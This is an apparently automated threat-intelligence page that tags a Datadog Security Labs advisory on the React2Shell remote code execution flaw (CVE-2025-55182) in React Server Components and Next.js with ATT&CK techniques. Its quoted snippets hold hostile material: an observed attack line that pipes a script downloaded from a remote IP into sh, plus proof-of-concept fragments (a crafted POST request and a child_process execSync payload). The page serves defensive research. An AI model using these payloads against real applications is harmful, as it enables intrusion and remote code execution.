TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Datadog Security Labs

CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js

2025-12-04

ATT&CK techniques detected

11 predictions
T1059.004 Unix Shell
83%
“can use the following search to identify if one of your applications is affected. Datadog App and API Protection (AAP) is also able to identify and block exploitation at runtime. Datadog Workload Protection identifies exploitation attempts using a custom agent rule reproduced b…”
T1083 File and Directory Discovery
70%
“", " / usr / bin / cksum ", " / usr / bin / comm ", " / usr / bin / csplit ", " / usr / bin / cut ", " / usr / bin / dircolors ", " / usr / bin / dirname ", " / usr / bin / du ", " / usr / bin / env ", " / usr / bin / expand ", " / usr / bin / expr ", " / usr / bin / factor ", " …”
T1190 Exploit Public-Facing Application
66%
“CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js Key points and observations - On December 3, a remote code execution (RCE) vulnerability was identified in React Server Components and tracked as CVE-2025-55182. - Under …”
T1190 Exploit Public-Facing Application
65%
“##r / bin / curl ] then curl http : / / 141. 11. 240. 103 : 45178 / test. sh | sh else wget - qo - http : / / 141. 11. 240. 103 : 45178 / test. sh | sh fi ). tostring ( ). trim ( ) throw object. assign ( new error ( next _ redirect ) { digest : ` next _ redirect push / login? a =…”
T1046 Network Service Discovery
61%
“December 3 around 10 p.m. UTC. As of December 5, we continued to observe both scanning and exploitation activity and have identified over 800 IP addresses exhibiting scanning behavior that are attempting to exploit applications of at least two distinct organizations. This activi…”
T1595.002 Vulnerability Scanning
56%
“December 3 around 10 p.m. UTC. As of December 5, we continued to observe both scanning and exploitation activity and have identified over 800 IP addresses exhibiting scanning behavior that are attempting to exploit applications of at least two distinct organizations. This activi…”
T1083 File and Directory Discovery
47%
“, " / bin / dd ", " / bin / df ", " / bin / dir ", " / bin / echo ", " / bin / ln ", " / bin / ls ", " / bin / mkdir ", " / bin / mknod ", " / bin / mktemp ", " / bin / mv ", " / bin / pwd ", " / bin / readlink ", " / bin / rm ", " / bin / rmdir ", " / bin / sleep ", " / bin / st…”
T1588.006 Vulnerabilities
36%
“: constructor : constructor " } } } eof echo - n ' " $ @ 0 " ' > payload2. txt curl - x post http : / / localhost : 3000 - h " next - action : dontcare " \ - f " 0 = < payload. json " - f ' 1 = < payload2. txt ' \ - - max - time 2 2 > / dev / null | | true following execution, th…”
T1210 Exploitation of Remote Services
35%
“December 3 around 10 p.m. UTC. As of December 5, we continued to observe both scanning and exploitation activity and have identified over 800 IP addresses exhibiting scanning behavior that are attempting to exploit applications of at least two distinct organizations. This activi…”
T1587.004 Exploits
32%
“: constructor : constructor " } } } eof echo - n ' " $ @ 0 " ' > payload2. txt curl - x post http : / / localhost : 3000 - h " next - action : dontcare " \ - f " 0 = < payload. json " - f ' 1 = < payload2. txt ' \ - - max - time 2 2 > / dev / null | | true following execution, th…”
T1059.006 Python
30%
“] } { " id " : " vm # runinthiscontext ", " bound " : [ " console. log ( ' you have been hacked! ' ) ; process. mainmodule. require ( ' child _ process ' ). execsync ( ' echo dvkdlhirajxc78t5 ' ). tostring ( ) " ] } { " id " : " vm # runinnewcontext ", " bound " : [ " this. const…”

Summary

Learn more about CVE-2025-55182, a vulnerability affecting React Server Components and Next.js.